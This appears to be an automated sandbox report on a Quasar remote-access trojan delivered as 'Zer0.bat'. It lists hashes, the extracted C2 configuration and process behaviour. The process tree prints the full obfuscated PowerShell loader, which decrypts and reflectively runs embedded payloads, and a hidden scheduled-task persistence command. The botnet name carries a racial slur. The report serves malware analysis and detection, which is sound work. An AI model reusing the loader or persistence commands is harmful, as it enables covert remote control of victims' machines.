quasar | c8c3dd02b8fea2a4f8a1eadd7c62d79dfcb147e9766692ee6de40fb6f9cd6ae6

General

Target

Zer0.bat
Size

586KB
MD5

23e8182ee8e5dc33add24206b72fe1b2
SHA1

744ef302e11c315fa8af3d2ba2830fdc326110ac
SHA256

c8c3dd02b8fea2a4f8a1eadd7c62d79dfcb147e9766692ee6de40fb6f9cd6ae6
SHA512

520911a8894efb73dcadf73a74a1721e852979eea54255160819e6485b40f4026216fa70f7d008c5762edc26a6a241bf216c1ef358ee97fb08a3c823a4cbb32d
SSDEEP

12288:2biIH9WV384D1jj9b88u/srbgkaeJwETjUjnTqTlPaJT1LQ6:2bin+459b8usq9ojT+iJ3

Score

10^/10

quasar nigga execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Nigga

C2

runderscore00-61208.portmap.host:61208

Mutex

QSR_MUTEX_8JC7DdKcgnk4fSVaPC

Attributes

encryption_key
03SyClWuZ5C4OQvoBqUJ
install_name
Zer0Spy-Main.exe
log_directory
$phantom-Logs
reconnect_delay
3000
startup_key
Powershell
subdirectory
$phantom-zero2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2180-144-0x000002126EF40000-0x000002126EF9E000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 2180 powershell.exe
4 2180 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2912 powershell.exe
3432 powershell.exe
2180 powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings powershell.exe

flow	pid	process
2	2180	powershell.exe
4	2180	powershell.exe

flow	ioc
1	ip-api.com

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2912	powershell.exe
2912	powershell.exe
3432	powershell.exe
3432	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeIncreaseQuotaPrivilege	3432	powershell.exe
Token: SeSecurityPrivilege	3432	powershell.exe
Token: SeTakeOwnershipPrivilege	3432	powershell.exe
Token: SeLoadDriverPrivilege	3432	powershell.exe
Token: SeSystemProfilePrivilege	3432	powershell.exe
Token: SeSystemtimePrivilege	3432	powershell.exe
Token: SeProfSingleProcessPrivilege	3432	powershell.exe
Token: SeIncBasePriorityPrivilege	3432	powershell.exe
Token: SeCreatePagefilePrivilege	3432	powershell.exe
Token: SeBackupPrivilege	3432	powershell.exe
Token: SeRestorePrivilege	3432	powershell.exe
Token: SeShutdownPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeSystemEnvironmentPrivilege	3432	powershell.exe
Token: SeRemoteShutdownPrivilege	3432	powershell.exe
Token: SeUndockPrivilege	3432	powershell.exe
Token: SeManageVolumePrivilege	3432	powershell.exe
Token: 33	3432	powershell.exe
Token: 34	3432	powershell.exe
Token: 35	3432	powershell.exe
Token: 36	3432	powershell.exe
Token: SeIncreaseQuotaPrivilege	3432	powershell.exe
Token: SeSecurityPrivilege	3432	powershell.exe
Token: SeTakeOwnershipPrivilege	3432	powershell.exe
Token: SeLoadDriverPrivilege	3432	powershell.exe
Token: SeSystemProfilePrivilege	3432	powershell.exe
Token: SeSystemtimePrivilege	3432	powershell.exe
Token: SeProfSingleProcessPrivilege	3432	powershell.exe
Token: SeIncBasePriorityPrivilege	3432	powershell.exe
Token: SeCreatePagefilePrivilege	3432	powershell.exe
Token: SeBackupPrivilege	3432	powershell.exe
Token: SeRestorePrivilege	3432	powershell.exe
Token: SeShutdownPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeSystemEnvironmentPrivilege	3432	powershell.exe
Token: SeRemoteShutdownPrivilege	3432	powershell.exe
Token: SeUndockPrivilege	3432	powershell.exe
Token: SeManageVolumePrivilege	3432	powershell.exe
Token: 33	3432	powershell.exe
Token: 34	3432	powershell.exe
Token: 35	3432	powershell.exe
Token: 36	3432	powershell.exe
Token: SeIncreaseQuotaPrivilege	3432	powershell.exe
Token: SeSecurityPrivilege	3432	powershell.exe
Token: SeTakeOwnershipPrivilege	3432	powershell.exe
Token: SeLoadDriverPrivilege	3432	powershell.exe
Token: SeSystemProfilePrivilege	3432	powershell.exe
Token: SeSystemtimePrivilege	3432	powershell.exe
Token: SeProfSingleProcessPrivilege	3432	powershell.exe
Token: SeIncBasePriorityPrivilege	3432	powershell.exe
Token: SeCreatePagefilePrivilege	3432	powershell.exe
Token: SeBackupPrivilege	3432	powershell.exe
Token: SeRestorePrivilege	3432	powershell.exe
Token: SeShutdownPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeSystemEnvironmentPrivilege	3432	powershell.exe
Token: SeRemoteShutdownPrivilege	3432	powershell.exe
Token: SeUndockPrivilege	3432	powershell.exe
Token: SeManageVolumePrivilege	3432	powershell.exe
Token: 33	3432	powershell.exe
Token: 34	3432	powershell.exe
Token: 35	3432	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

2180 powershell.exe

pid	process
2180	powershell.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 3084 wrote to memory of 2748	3084	cmd.exe	cmd.exe
PID 3084 wrote to memory of 2748	3084	cmd.exe	cmd.exe
PID 3084 wrote to memory of 2912	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 2912	3084	cmd.exe	powershell.exe
PID 2912 wrote to memory of 3432	2912	powershell.exe	powershell.exe
PID 2912 wrote to memory of 3432	2912	powershell.exe	powershell.exe
PID 2912 wrote to memory of 2296	2912	powershell.exe	WScript.exe
PID 2912 wrote to memory of 2296	2912	powershell.exe	WScript.exe
PID 2296 wrote to memory of 1472	2296	WScript.exe	cmd.exe
PID 2296 wrote to memory of 1472	2296	WScript.exe	cmd.exe
PID 1472 wrote to memory of 4884	1472	cmd.exe	cmd.exe
PID 1472 wrote to memory of 4884	1472	cmd.exe	cmd.exe
PID 1472 wrote to memory of 2180	1472	cmd.exe	powershell.exe
PID 1472 wrote to memory of 2180	1472	cmd.exe	powershell.exe
PID 2180 wrote to memory of 3260	2180	powershell.exe	Explorer.EXE
PID 2180 wrote to memory of 1176	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1764	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 5112	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1368	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 760	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2332	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2920	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 3904	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1144	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2516	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1136	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 936	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 820	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1120	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1108	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1300	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2084	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 4440	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2468	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1876	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1480	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2460	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2652	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2060	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1072	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2252	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2644	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2636	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 460	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 3412	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 4592	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1636	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1584	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1828	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1232	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1428	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1624	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 3396	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1224	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2208	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2596	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1608	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 2588	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 1996	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 4148	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 404	2180	powershell.exe	svchost.exe
PID 2180 wrote to memory of 992	2180	powershell.exe	svchost.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2920

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Zer0.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:3084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zBaaBHx3j6AC8AgsWtzNY4o+cs5Hsz8D2jNBVxJlNss='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw9FJUazyFqyLpZQ1HfDnQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OHDMP=New-Object System.IO.MemoryStream(,$param_var); $rDLhe=New-Object System.IO.MemoryStream; $cpSWI=New-Object System.IO.Compression.GZipStream($OHDMP, [IO.Compression.CompressionMode]::Decompress); $cpSWI.CopyTo($rDLhe); $cpSWI.Dispose(); $OHDMP.Dispose(); $rDLhe.Dispose(); $rDLhe.ToArray();}function execute_function($param_var,$param2_var){ $iuAAC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TqwFC=$iuAAC.EntryPoint; $TqwFC.Invoke($null, $param2_var);}$nVyiT = 'C:\Users\Admin\AppData\Local\Temp\Zer0.bat';$host.UI.RawUI.WindowTitle = $nVyiT;$zgURt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nVyiT).Split([Environment]::NewLine);foreach ($wDQfL in $zgURt) { if ($wDQfL.StartsWith('kDFoazWuFjsDUKvTgCbr')) { $KlmyM=$wDQfL.Substring(20); break; }}$payloads_var=[string[]]$KlmyM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:2748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_696_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:2296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zBaaBHx3j6AC8AgsWtzNY4o+cs5Hsz8D2jNBVxJlNss='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw9FJUazyFqyLpZQ1HfDnQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OHDMP=New-Object System.IO.MemoryStream(,$param_var); $rDLhe=New-Object System.IO.MemoryStream; $cpSWI=New-Object System.IO.Compression.GZipStream($OHDMP, [IO.Compression.CompressionMode]::Decompress); $cpSWI.CopyTo($rDLhe); $cpSWI.Dispose(); $OHDMP.Dispose(); $rDLhe.Dispose(); $rDLhe.ToArray();}function execute_function($param_var,$param2_var){ $iuAAC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TqwFC=$iuAAC.EntryPoint; $TqwFC.Invoke($null, $param2_var);}$nVyiT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat';$host.UI.RawUI.WindowTitle = $nVyiT;$zgURt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nVyiT).Split([Environment]::NewLine);foreach ($wDQfL in $zgURt) { if ($wDQfL.StartsWith('kDFoazWuFjsDUKvTgCbr')) { $KlmyM=$wDQfL.Substring(20); break; }}$payloads_var=[string[]]$KlmyM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:4884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:5112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4148

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
1KB

MD5
3ec0d76d886b2f4b9f1e3da7ce9e2cd7

SHA1
68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

SHA256
214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

SHA512
a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qsu4je5i.bbc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat
Filesize
586KB

MD5
23e8182ee8e5dc33add24206b72fe1b2

SHA1
744ef302e11c315fa8af3d2ba2830fdc326110ac

SHA256
c8c3dd02b8fea2a4f8a1eadd7c62d79dfcb147e9766692ee6de40fb6f9cd6ae6

SHA512
520911a8894efb73dcadf73a74a1721e852979eea54255160819e6485b40f4026216fa70f7d008c5762edc26a6a241bf216c1ef358ee97fb08a3c823a4cbb32d

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs
Filesize
124B

MD5
b9e6132dd195db4d43770b394de14f31

SHA1
1c5dce6b9ac1d7476ae3654386ed6032c00cde36

SHA256
82752211d13d9e5eae1bbff22e2137b65fe0eecce172f6c5cab6060925adc308

SHA512
07e97cc980a70df0f20ae37131e4db50428a41a50b6356ebcf035ec0942c9d878d005d8c4306ed54b1918c35b0383a5acd1ebe8c679c4610d292b2b3da0d2cc2

Download Submit
memory/760-100-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1072-103-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1108-98-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1120-102-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1224-109-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1300-101-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1428-107-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1584-106-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1624-110-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/1764-96-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/2060-99-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/2180-146-0x000002126F420000-0x000002126F45C000-memory.dmp

Filesize
240KB

Download
memory/2180-145-0x000002126F3C0000-0x000002126F3D2000-memory.dmp

Filesize
72KB

Download
memory/2180-144-0x000002126EF40000-0x000002126EF9E000-memory.dmp

Filesize
376KB

Download
memory/2252-105-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/2636-104-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/2912-122-0x00007FF8359D0000-0x00007FF836492000-memory.dmp

Filesize
10.8MB

Download
memory/2912-9-0x000001CE7F570000-0x000001CE7F592000-memory.dmp

Filesize
136KB

Download
memory/2912-15-0x000001CE7FB10000-0x000001CE7FB80000-memory.dmp

Filesize
448KB

Download
memory/2912-0-0x00007FF8359D3000-0x00007FF8359D5000-memory.dmp

Filesize
8KB

Download
memory/2912-10-0x00007FF8359D0000-0x00007FF836492000-memory.dmp

Filesize
10.8MB

Download
memory/2912-14-0x000001CE7F5B0000-0x000001CE7F5B8000-memory.dmp

Filesize
32KB

Download
memory/2912-13-0x000001CE7FAC0000-0x000001CE7FB06000-memory.dmp

Filesize
280KB

Download
memory/2912-12-0x00007FF8359D0000-0x00007FF836492000-memory.dmp

Filesize
10.8MB

Download
memory/2912-11-0x00007FF8359D0000-0x00007FF836492000-memory.dmp

Filesize
10.8MB

Download
memory/2920-97-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/3260-95-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/3260-47-0x0000000005A60000-0x0000000005A8A000-memory.dmp

Filesize
168KB

Download
memory/3396-108-0x00007FF816E10000-0x00007FF816E20000-memory.dmp

Filesize
64KB

Download
memory/3432-25-0x00007FF8359D0000-0x00007FF836492000-memory.dmp

Filesize
10.8MB

Download
